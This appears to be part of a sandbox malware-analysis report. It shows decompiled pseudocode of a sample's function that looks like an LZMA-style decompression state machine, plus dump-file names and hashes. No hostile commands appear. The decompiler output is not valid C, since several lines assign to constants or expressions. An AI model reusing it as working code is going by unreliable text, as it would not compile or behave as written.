															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L80;
											case 0x1b:
												L76:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t275 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t275;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t284 = __ebp - 0x64;
												 *_t284 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t284;
												 *( *(__ebp - 0x68)) = __cl;
												L80:
												 *(__ebp - 0x14) = __edx;
												goto L81;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L81:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t535 = _t534 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}

Memory Dump Source

Source File: 00000005.00000002.719266122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.719245816.0000000000400000.00000002.00020000.sdmpDownload File
Associated: 00000005.00000002.719274597.0000000000407000.00000002.00020000.sdmpDownload File
Associated: 00000005.00000002.719289522.0000000000409000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719317497.0000000000422000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719325242.0000000000429000.00000004.00020000.sdmpDownload File
Associated: 00000005.00000002.719366138.000000000042C000.00000002.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_rstmgknbahw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26fed0205269c67c4524460d7550c555d61838a406f219378ffc8409cc06287b
Instruction ID: b59dca7a73cfed8a049a6b6a8b4acb584d685fa01604791ee1d6e054a78b3619
Opcode Fuzzy Hash: 26fed0205269c67c4524460d7550c555d61838a406f219378ffc8409cc06287b
Instruction Fuzzy Hash: 08714671D04229CFEF28CF98C844BADBBB1FB44305F15816AD816BB281C7789996DF54

Uniqueness

Uniqueness Score: -1.00%

Function 00406355 Relevance: 5.2, APIs: 4, Instructions: 168
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406355() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xa;
						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
					} else {
						 *(__ebp - 0x84) = 9;
						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
					}
					while(1) {
						 *(_t613 - 0x54) = _t606;
						while(1) {
							L133:
							_t531 =  *_t606;
							_t589 = _t531 & 0x0000ffff;
							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
							if( *(_t613 - 0xc) >= _t565) {
								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
								 *(_t613 - 0x40) = 1;
								_t532 = _t531 - (_t531 >> 5);
								 *_t606 = _t532;
							} else {
								 *(_t613 - 0x10) = _t565;
								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
								 *_t606 = (0x800 - _t589 >> 5) + _t531;
							}
							if( *(_t613 - 0x10) >= 0x1000000) {
								goto L139;
							}
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								L170:
								_t568 = 0x22;
								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
								_t535 = 0;
								L172:
								return _t535;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L139:
							_t533 =  *(_t613 - 0x84);
							while(1) {
								 *(_t613 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t613 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M004068EF))) {
										case 0:
											if( *(_t613 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t534 =  *( *(_t613 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t570);
											_push(9);
											_pop(_t571);
											_t609 = _t538 / _t570;
											_t540 = _t538 % _t570 & 0x000000ff;
											asm("cdq");
											_t604 = _t540 % _t571 & 0x000000ff;
											 *(_t613 - 0x3c) = _t604;
											 *(_t613 - 0x1c) = (1 << _t609) - 1;
											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
											_t612 = (0x300 << _t604 + _t609) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
												L10:
												if(_t612 == 0) {
													L12:
													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t612 = _t612 - 1;
													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
												} while (_t612 != 0);
												goto L12;
											}
											if( *(_t613 - 4) != 0) {
												GlobalFree( *(_t613 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t613 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 1;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t45 = _t613 - 0x48;
											 *_t45 =  *(_t613 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t613 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t613 - 0x40);
											if(_t546 ==  *(_t613 - 0x74)) {
												L20:
												 *(_t613 - 0x48) = 5;
												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t613 - 0x74) = _t546;
											if( *(_t613 - 8) != 0) {
												GlobalFree( *(_t613 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
											 *(_t613 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
											 *(_t613 - 0x84) = 6;
											 *(_t613 - 0x4c) = _t553;
											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
											 *(_t613 - 0x54) = _t606;
											goto L133;
										case 3:
											L21:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 3;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											_t67 = _t613 - 0x70;
											 *_t67 =  &(( *(_t613 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
											L23:
											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
											if( *(_t613 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t606;
											_t589 = _t531 & 0x0000ffff;
											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
											if( *(_t613 - 0xc) >= _t565) {
												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
												 *(_t613 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												 *_t606 = _t532;
											} else {
												 *(_t613 - 0x10) = _t565;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
												 *_t606 = (0x800 - _t589 >> 5) + _t531;
											}
											if( *(_t613 - 0x10) >= 0x1000000) {
												goto L139;
											}
										case 5:
											goto L137;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 8:
											goto L0;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L89;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t258 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t258;
											0 | _t258 = _t258 + _t258 + 9;
											 *(__ebp - 0x38) = _t258 + _t258 + 9;
											goto L75;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x28);
											goto L88;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L88:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L89:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 0x12:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *(__ebp - 0x7c) = 0x14;
												goto L145;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											 *(_t613 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
